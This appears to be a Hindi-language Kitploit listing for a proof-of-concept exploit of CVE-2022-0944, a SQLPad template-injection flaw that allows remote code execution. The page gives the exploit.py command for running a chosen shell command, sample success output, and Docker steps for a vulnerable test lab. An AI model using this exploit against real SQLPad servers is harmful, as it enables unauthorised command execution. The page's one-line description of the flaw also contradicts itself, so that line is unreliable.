Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/flojboj/cve-2022-0944
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubflojboj/cve-2022-0944

CVE-2022-0944

SQLPad - टेम्पलेट इंजेक्शन (SQLPad RCE [CVE-2022-0944] के लिए POC शोषण)

रिपॉजिटरी देखें
5441 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-0944

SQLPad - टेम्पलेट इंजेक्शन

यह एक ब्लाइंड कमजोरी है, जिसका अर्थ है कि आउटपुट सीधे प्रतिक्रिया में वापस आ जाता है।

शोषण

निम्नलिखित कमांड के साथ स्क्रिप्ट का उपयोग करें:
python3 exploit.py --url http://localhost:13000 --command 'ls -la > /tmp/test' --username admin --password password

आउटपुट

root@kitploit:~
[*] लॉगिन सफल रहा
[*] शोषण सफल!

परीक्षण वातावरण

Docker का उपयोग करते हुए:

  • Docker कंटेनर शुरू करें - sudo docker run -p 13000:3000 -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=password --name vulnerable-sqlpad sqlpad/sqlpad:6.10.0
  • Docker कंटेनर से कनेक्ट करें - sudo docker exec -it vulnerable-sqlpad /bin/bash

वेब इंटरफ़ेस तक पहुँचने के लिए, URL http://localhost:13000 का उपयोग करें और क्रेडेंशियल admin:password का उपयोग करें।

प्रभावित संस्करण

<= 6.10.0

स्रोत

https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb

अस्वीकरण

केवल शैक्षिक उद्देश्यों या CTF चुनौतियों के लिए उपयोग करें।

टूल डाउनलोड करें